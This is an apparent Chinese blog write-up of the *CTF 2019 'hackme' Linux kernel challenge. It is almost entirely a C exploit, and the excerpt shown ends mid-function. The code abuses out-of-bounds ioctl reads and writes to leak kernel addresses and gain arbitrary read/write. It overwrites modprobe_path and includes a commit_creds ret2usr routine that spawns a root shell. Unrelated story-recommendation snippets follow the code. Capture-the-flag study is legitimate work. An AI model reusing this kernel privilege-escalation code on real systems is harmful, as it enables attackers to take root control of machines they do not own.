*ctf 2019 hackme

read和write操作可以越界读写,泄露出kernel_base和codbase之后劫持数组指针实现任意地址读写,然后改写modprobe_path

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stropts.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <pthread.h>
#define REQ_CREATE 0x30000
#define REQ_DELETE 0x30001
#define REQ_READ 0x30003
#define REQ_WRITE 0x30002
size_t user_cs, user_ss, user_rflags, user_sp;
size_t commit_creds = 0, prepare_kernel_cred = 0;
size_t vmlinux_base = 0;

struct command {
    unsigned int index;
    unsigned int unused;
    char *buffer;
    long size;
    long offset;    
};

void add(int fd, int id, int size, char *init_buffer) {
    struct command command;
    
    command.index = id;
    command.buffer = init_buffer;
    command.size = size;

    ioctl(fd, REQ_CREATE, &command);
}

void fr(int fd, long id) {
    struct command command;

    command.index = id;

    ioctl(fd, REQ_DELETE, &command);
}

void show(int fd, int id, char *dest, int offset, int size) {
    struct command command;

    command.index = id;
    command.size = size;
    command.buffer = dest;
    command.offset = offset;

    ioctl(fd, REQ_READ, &command);
}

void edit(int fd, int id, char *src, int offset, int size) {
    struct command command;

    command.index = id;
    command.size = size;
    command.buffer = src;
    command.offset = offset;

    ioctl(fd, REQ_WRITE, &command);
}

void lg(char *s,size_t addr){
    printf("[+]%s ==> 0x%llx\n",s,addr);
}

void error(char *msg) {
    printf("[-] %s\n", msg);
    exit(-1);
}
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    puts("[*]status has been saved.");
}

void get_shell(void){
    system("/bin/sh");
}

void get_root()
{
    char* (*pkc)(int) = prepare_kernel_cred;
    void (*cc)(char*) = commit_creds;
    (*cc)((*pkc)(0));
}
void spawn_shell()
{
    if(!getuid())
    {
        puts("Get shell");
        system("/bin/sh");
    }
    else
    {
        puts("[*]spawn shell error!");
    }
    exit(0);
}
int exp(){
    get_root();
    __asm__(
        "push user_ss;"
        "push user_sp;"
        "push user_rflags;"
        "push user_cs;"
        "push spawn_shell;"
        "swapgs;"
        "iretq;"
     );
}
int main()
{
    save_status();
    char *addr = malloc(0x1000);
    printf("addr: %llx\n",addr);
    int fd = open("/dev/hackme",0);
    if(fd < 0){
        puts("open error");
        exit(0);
    }

    memset(addr,'A',0x10);
    printf("%s\n",addr );
    add(fd,0,0x100,addr);
    add(fd,1,0x100,addr);
    add(fd,2,0x100,addr);
    add(fd,3,0x100,addr);
    add(fd,4,0x100,addr);
    add(fd,5,0x100,addr);
    show(fd,0,addr,-0x200,0x200);
    /*for(unsigned int i = 0;i<0x100;i++){
        printf("addr[%d] == %llx\n",i,*(size_t *)(addr+i*8));
    }*/
    //printf("%llx\n",addr);
    size_t kernel_base = *(size_t *)(addr)-0x8472c0;
    lg("kernel_base",kernel_base);
    size_t codebase = kernel_base+0x811000;
    size_t addr2[0x100] = {0};
    size_t target = codebase;
    addr2[0] = codebase+0x30;
    fr(fd,0);
    fr(fd,1);
    edit(fd,2,addr2,-0x100,0x100);
    add(fd,6,0x100,addr);
    size_t a1[0x8] = {0};
    add(fd,7,0x100,a1);
    show(fd,7,addr,0x8,0x10);
    show(fd,7,addr,-0x20,0x20);
    /*for(unsigned int i = 0;i<0x100;i++){
        printf("addr[%d] == %llx\n",i,*(size_t *)(addr+i*8));
    }*/
    codebase = *(size_t *)(addr)-0x2338;
    size_t addrList = codebase+0x2400;
    fr(fd,3);
    fr(fd,4);
    addr2[0] = addrList;
    edit(fd,5,addr2,-0x100,0x100);
    add(fd,3,0x100,a1);
    add(fd,4,0x100,a1);
    addr2[0] = 0x83f960+kernel_base;
    addr2[1] = 0x100;
    char *addr3 = "/home/1.sh\x00";
    edit(fd,4,addr2,0x10,0x10);
    edit(fd,1,addr3,0,0x10);
    system("echo -ne '#!/bin/sh\n/bin/cp /root/flag /home/flag\n/bin/chmod 777 /home/flag' > /home/1.sh");
    system("echo -ne '\xff\xff\xff\xff' > /home/aaa");
    system("chmod +x /home/1.sh");
    system("chmod +x /home/aaa");
    system("/home/aaa");
    system("cat /home/flag");
    //show(fd,0,addr,-0x200,0x200);
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 199,830评论 5 468
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 83,992评论 2 376
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 146,875评论 0 331
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 53,837评论 1 271
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 62,734评论 5 360
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,091评论 1 277
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,550评论 3 390
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,217评论 0 254
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,368评论 1 294
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,298评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,350评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,027评论 3 315
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,623评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,706评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,940评论 1 255
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,349评论 2 346
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 41,936评论 2 341

推荐阅读更多精彩内容